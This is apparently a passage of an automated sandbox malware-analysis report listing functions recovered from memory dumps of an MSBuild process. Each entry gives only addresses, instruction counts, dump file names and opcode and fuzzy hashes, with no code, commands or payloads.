                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2586159739.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_70d000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 79b904a149b28e9f4c1dead4679e973aab7a2623f7cafbd67470f055580e3606
                                                                  • Instruction ID: 8df3f8bf9877fcd45222a9167f8642412a717bad34a14c88736f3996d43485c7
                                                                  • Opcode Fuzzy Hash: 79b904a149b28e9f4c1dead4679e973aab7a2623f7cafbd67470f055580e3606
                                                                  • Instruction Fuzzy Hash: 0C11B176504384DFCB15CF50D9C4B16BFA2FB94324F24C6A9EC490B656C33AE85ACBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323421B Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4ac0c3bed17cdefba40aeadae383d2b5868b2d5d456d87cbe4c2ab1f870f366d
                                                                  • Instruction ID: be95cdc51cfa131a69251fb619fa0e1b2c1161c4b7bdba07dc48c3e1cb9c615f
                                                                  • Opcode Fuzzy Hash: 4ac0c3bed17cdefba40aeadae383d2b5868b2d5d456d87cbe4c2ab1f870f366d
                                                                  • Instruction Fuzzy Hash: 8701DE707180511BD715A6BD8C20B0BABEADBCA710F1488BAE40AD7383DA28DD4243A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323F1B9 Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08c4678362ee8e11e1973e88852c5779ca6581243e2ef2840293bee81dc8bb22
                                                                  • Instruction ID: c0ffd301466583f983b4ac651605d1d87a00166f4ab3a774fa2f2dc9f98c8d42
                                                                  • Opcode Fuzzy Hash: 08c4678362ee8e11e1973e88852c5779ca6581243e2ef2840293bee81dc8bb22
                                                                  • Instruction Fuzzy Hash: 4301B5717043116BC715EA6CEC90F1A77EAEBCBB10F1488BAE50AC7342DA65DD4243A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04231254 Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b3480a90fe1021c94dabe71c9f4948f2b0c8811699916e09855a09174a767c32
                                                                  • Instruction ID: be3559a6aca2bd14eb1a97a033baee1f5da6f6b94b6019ce141614ead135f408
                                                                  • Opcode Fuzzy Hash: b3480a90fe1021c94dabe71c9f4948f2b0c8811699916e09855a09174a767c32
                                                                  • Instruction Fuzzy Hash: 9111C0B0B147505FE3A8DB3D8451727BBF6EBCD604B14896E908EC7795EA60FC054760
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23238091 Relevance: .1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 211a1d0040d407749f4f325232c5649d812491913b48211c21ae8d81afca1833
                                                                  • Instruction ID: f62e505dab1330c5a1e1c1911a28e5a9a557b5d5a43f7289cea0427d4ff43488
                                                                  • Opcode Fuzzy Hash: 211a1d0040d407749f4f325232c5649d812491913b48211c21ae8d81afca1833
                                                                  • Instruction Fuzzy Hash: DF0142B2710315DBDF1859A1CC809DBB769EB83A60F0040F5DE00EF250DA70E98DC7A5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23233BC7 Relevance: .1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 60896b77e0eeafbf0d9b90fb4369d4928baf16d5ed53621d874641ae21c7f332
                                                                  • Instruction ID: dbc33a5373c871dc851897b8451346902e60635d4d428e67174bdc2516b62026
                                                                  • Opcode Fuzzy Hash: 60896b77e0eeafbf0d9b90fb4369d4928baf16d5ed53621d874641ae21c7f332
                                                                  • Instruction Fuzzy Hash: 23016872B041544BDB05967DCC24A9F3BAFDBCA700F05847AD601DB241EE38CE4187E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23233891 Relevance: .1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e34767dcedcc6af9b8a82e3e051d90984c56a3f3239ccb115aba4c89d5109a05
                                                                  • Instruction ID: c701d821760e9c980093b49a55a3bcf5012fd50523da7cf8689c4ea4efe33725
                                                                  • Opcode Fuzzy Hash: e34767dcedcc6af9b8a82e3e051d90984c56a3f3239ccb115aba4c89d5109a05
                                                                  • Instruction Fuzzy Hash: 5921C4B1D11259DFDB00DF9AD884ADEFBF4FB49314F10816AE918A7200C374A944CFA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00A0D207 Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2586485355.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_a0d000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d4136c9098ae064738d23d2dea6867f09ba1a2f7c4477a6d4ed16617dce24ac4
                                                                  • Instruction ID: 49b45c8bb2f3338679075130c20a443cd3e5bc293836a2e67dd5005dd07596e0
                                                                  • Opcode Fuzzy Hash: d4136c9098ae064738d23d2dea6867f09ba1a2f7c4477a6d4ed16617dce24ac4
                                                                  • Instruction Fuzzy Hash: 9211C476504284CFDB11CF54D5C4B55FF61FB88324F24C6A9DC494B646C33AD856CB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00A0D3B7 Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2586485355.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_a0d000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eedb4de5bd015544abc985a2142c23fa5b619469340c68dccb7b54295b8d7ac
                                                                  • Instruction ID: 96a0bb52e27e8809e690185fcff33ec6ef6b3b290fcbc1a45de1b5ab7f70e396
                                                                  • Opcode Fuzzy Hash: 6eedb4de5bd015544abc985a2142c23fa5b619469340c68dccb7b54295b8d7ac
                                                                  • Instruction Fuzzy Hash: 37118B76504284DFCB05CF50E5C4B15BBA2FB84314F24C6AAD8494B696C33AE84ACFA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00A0D03F Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2586485355.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_a0d000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eedb4de5bd015544abc985a2142c23fa5b619469340c68dccb7b54295b8d7ac
                                                                  • Instruction ID: dcad05d7f156b7223a6b72c019694a3eb29cfb117b5091002ac4d97c7ccbd475
                                                                  • Opcode Fuzzy Hash: 6eedb4de5bd015544abc985a2142c23fa5b619469340c68dccb7b54295b8d7ac
                                                                  • Instruction Fuzzy Hash: 9C118B76504288DFCB15CF50E9C4B15BBA2FB84318F24C6ADD8494B696C33AD85ACF62
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23233068 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a1d340a2ef9928241039871457d959e899c7ef430eb6f7532cb116d926f3f5d2
                                                                  • Instruction ID: ee7f42e4fc4aab6db77a52839f5845338fc869e8d314efa6e35f989b38319579
                                                                  • Opcode Fuzzy Hash: a1d340a2ef9928241039871457d959e899c7ef430eb6f7532cb116d926f3f5d2
                                                                  • Instruction Fuzzy Hash: B1018471F002188BCB14DBB9DD405CEF7F5EBC9710F1085A9D605EB244DA31EA81CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23233898 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8d3f1e744a2337f5690ac916480dc59e1656e5086f8cd090123fbfe8ac8e99ad
                                                                  • Instruction ID: 730b39aa54c9e190dd27ffcb3717545c1d2c781ee01cf08e9e52f6be0edee69a
                                                                  • Opcode Fuzzy Hash: 8d3f1e744a2337f5690ac916480dc59e1656e5086f8cd090123fbfe8ac8e99ad
                                                                  • Instruction Fuzzy Hash: 1E11D3B1D11219DFDB00DF9AD884ADEFBF4FB49314F10812AE918A7200C378A940CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23234228 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 970808099e1ba2b092eee38e68b23a0d59e556bee66e8711b74e554cb601d6b6
                                                                  • Instruction ID: 07d7b41ee913276f9d3c6a8c190b50f9e0f421233ffcd537e6e8cceb0b85c0b9
                                                                  • Opcode Fuzzy Hash: 970808099e1ba2b092eee38e68b23a0d59e556bee66e8711b74e554cb601d6b6
                                                                  • Instruction Fuzzy Hash: 2601F4707140115BD718A6ADCC14B0BA3EFDBCA710F2488BAE40ED7386EE79DD4243A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04231268 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c83acd8de39279602358445faddf218e8c15a8f95e65a935922089c16c6eb426
                                                                  • Instruction ID: ff08207f841013d9aadbcf7847b07e59595d81ce7c42655f8bd7822ab4e47fbc
                                                                  • Opcode Fuzzy Hash: c83acd8de39279602358445faddf218e8c15a8f95e65a935922089c16c6eb426
                                                                  • Instruction Fuzzy Hash: 50014CB0B10B145FE3A8DA6DC451727B6EAEBCC654B10897EA54EC3B54EAB0FC014B64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 042316F1 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67a5326747a79c56ef1f9f1df6a2e9988cfb176135cb4eaab2c25ae0fa462de1
                                                                  • Instruction ID: 67a899f26be7bea1655cb59ec77d4056d707c77bbb1c7f2376ca1a8622ad98e2
                                                                  • Opcode Fuzzy Hash: 67a5326747a79c56ef1f9f1df6a2e9988cfb176135cb4eaab2c25ae0fa462de1
                                                                  • Instruction Fuzzy Hash: D511C2B47243519FD325CF2995845377FB2EB85706B0C888ED087C2651D774F862CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323F1C8 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c880b9acbfe67ab289856a13f9e58170efe739b01ede78c2ebb4b6fb8de0f6c
                                                                  • Instruction ID: 552d091374345cc18944c9dcbc57a2ca5ebc73665ed729b6967f5ab04f53a0de
                                                                  • Opcode Fuzzy Hash: 6c880b9acbfe67ab289856a13f9e58170efe739b01ede78c2ebb4b6fb8de0f6c
                                                                  • Instruction Fuzzy Hash: D101F4757042116BC715EA6CEC50B2F63DAEBCAB10F14883AE40EC7341DE29DD424391
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323FCA1 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 142bd8f582f657db2a50013cf9a6e7361d16235a3aaffb39c6b36c558afc6f74
                                                                  • Instruction ID: f57b8fc520b4803c100a1ff088e503a2f289d4d66f10086e438a799416368956
                                                                  • Opcode Fuzzy Hash: 142bd8f582f657db2a50013cf9a6e7361d16235a3aaffb39c6b36c558afc6f74
                                                                  • Instruction Fuzzy Hash: AB11C4B1A10219AFCB14DF74E859BEE7BB2AF89301F104568E502E7261DB305D45CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04230B6C Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 79011effe8111fdf12120a432107662d407a6d4637eda66fbd51ced09fae1a3b
                                                                  • Instruction ID: 085f650f7d1576562a2e776cbd6aed17b12206eac111b2ba526f695a9ea509dd
                                                                  • Opcode Fuzzy Hash: 79011effe8111fdf12120a432107662d407a6d4637eda66fbd51ced09fae1a3b
                                                                  • Instruction Fuzzy Hash: 8C0175B43347109BD3248F25D9849377BF5FB85B42B18899DE44786600D7B5F852DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323A340 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d4869626d3b7b39515d670b0928e650e887f4ae4b87fb5d03c01cdcc4458e47
                                                                  • Instruction ID: a1cf17b78b6a52b757587ee4295155dc3df8a7be2dbde9f2df7df9dfc6bc8b60
                                                                  • Opcode Fuzzy Hash: 2d4869626d3b7b39515d670b0928e650e887f4ae4b87fb5d03c01cdcc4458e47
                                                                  • Instruction Fuzzy Hash: A6018C707005115BD755AA6CCC50B1EB3EAEB8A710F208839E80AC7342EA29DD818392
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0070D8DD Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2586159739.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_70d000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a0de2674856b71bc83a7f5485a982af12ca610e209ba4664fa1c0de8a75d02ad
                                                                  • Instruction ID: 290fe0745655f8e80a4f639dc95b2b91f8d5b6a6f34e002044b860dfd55bd0e6
                                                                  • Opcode Fuzzy Hash: a0de2674856b71bc83a7f5485a982af12ca610e209ba4664fa1c0de8a75d02ad
                                                                  • Instruction Fuzzy Hash: 8101A271514344DFE7208B95CC84B66BBE8EF91724F28C65AED494A2C6C37CAC40CAB6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 042327F5 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b7043a6777d234e4d2b1b9b64127eb9bf4423c4d2a2528f7d9e9991e7045b5ab
                                                                  • Instruction ID: 53e536e99e81595eabab6210a145e690c5d5b31c46263f52d16ad3933d33c755
                                                                  • Opcode Fuzzy Hash: b7043a6777d234e4d2b1b9b64127eb9bf4423c4d2a2528f7d9e9991e7045b5ab
                                                                  • Instruction Fuzzy Hash: B8014CB0E10319DFEB25CF6AC4043EE7BF1AF45311F248269D454AA1A0D3745A40CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0070D8DC Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2586159739.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_70d000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6de69770e7c4ea9a0819e92a08394609c200700dcdb41d6e379993b181b2add2
                                                                  • Instruction ID: 256602672ac344f545614808ec85808324aad020c62614de6173de697460cde4
                                                                  • Opcode Fuzzy Hash: 6de69770e7c4ea9a0819e92a08394609c200700dcdb41d6e379993b181b2add2
                                                                  • Instruction Fuzzy Hash: CDF06271404344EFE7208B56CC88B66FFD8EB91734F18C55AED484B286C278AC44CA75
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04232892 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9cb21ce4a7c6f496d06a7ff2fc63e80004509877d3503bd2867961a60591d559
                                                                  • Instruction ID: da27945533c777630d207a93480a49c893f60f03041529deb020ae441472f5dd
                                                                  • Opcode Fuzzy Hash: 9cb21ce4a7c6f496d06a7ff2fc63e80004509877d3503bd2867961a60591d559
                                                                  • Instruction Fuzzy Hash: CBF0E2727082449FD3018B6A9C84AABFFFDEFDB62071540AFE044CB362C9709C0183A4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04232800 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 353c729ed3b9e5eb6a3af60350a6744aa30eec1a251ab427196996edbc89dc28
                                                                  • Instruction ID: c201bd210d65b3d95db61a7a97e7844b2748db19f08b286e38f31fc314675bcb
                                                                  • Opcode Fuzzy Hash: 353c729ed3b9e5eb6a3af60350a6744aa30eec1a251ab427196996edbc89dc28
                                                                  • Instruction Fuzzy Hash: 0901E8B0E10319DFDB25DF6AC4043AEBAF1BF48355F108265E424AA2A0D7745A40CFE0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 042328A0 Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 246a0f4c8f6caa2d00622f9d9c398998ff7b2ea318589fd9996eea5d07cbe488
                                                                  • Instruction ID: 6a003347929bf5b2cfec357049dff9df253f08717fc82da7bb67ef4606f0c672
                                                                  • Opcode Fuzzy Hash: 246a0f4c8f6caa2d00622f9d9c398998ff7b2ea318589fd9996eea5d07cbe488
                                                                  • Instruction Fuzzy Hash: 73E09B717002149FD3049A5EDC44E5BF7EDFFD9630B21407AF504D7351C970AC0086A4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 042328E0 Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c25011a689777b17d6118a6b4bf413dfd68baecf74d0db308daf26c6470fa8f2
                                                                  • Instruction ID: 788e1d37102cbe065d635f4230ff122e08716d1d1fd4782c1f42a580109ebaa6
                                                                  • Opcode Fuzzy Hash: c25011a689777b17d6118a6b4bf413dfd68baecf74d0db308daf26c6470fa8f2
                                                                  • Instruction Fuzzy Hash: 31F065B67496405FD3118B2AD8D4D45FFA4EF9A63071540AAF549CB363D5209D06C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04230430 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6acd15577d569e57eb58b3c9f89a8c4d745dbc706ed17696c3cfe884f414196
                                                                  • Instruction ID: f7780e727a3618e0f55d3ca8f59ba7c3b030afd4018a1923b138fb8fb67a81e4
                                                                  • Opcode Fuzzy Hash: c6acd15577d569e57eb58b3c9f89a8c4d745dbc706ed17696c3cfe884f414196
                                                                  • Instruction Fuzzy Hash: 06F02B757641408FC7058B69A4900387BFBFFCA52135A80EED14DD7353DD21AC06C310
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04231948 Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3e5c9af9bef177c55e2415cd55c069602d2f8e88ccddfecb198d30da3eb95b12
                                                                  • Instruction ID: 49653cf839d3357caf82423ff2b7860a1d6848dda746b318c65bdabc8fb78c72
                                                                  • Opcode Fuzzy Hash: 3e5c9af9bef177c55e2415cd55c069602d2f8e88ccddfecb198d30da3eb95b12
                                                                  • Instruction Fuzzy Hash: 60F030B5E10714AF8B34CFA9D8008AAFBF9EF48711B00856EE455D3600D731E9548B90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04231942 Relevance: .0, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bce579f2696d1d00d840b55af481bd7c2fb9a63411ac7d2ea6b66c23c3eb8bd4
                                                                  • Instruction ID: dbe275b31d6c0abb5d86b031dd3c22edee0d6356e30c1b3551db6f98e709ae2f
                                                                  • Opcode Fuzzy Hash: bce579f2696d1d00d840b55af481bd7c2fb9a63411ac7d2ea6b66c23c3eb8bd4
                                                                  • Instruction Fuzzy Hash: DFF082F4E04301AF9B25CFA994008AABFF6EB48210B0445AED581C7111D731E525CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04230E52 Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
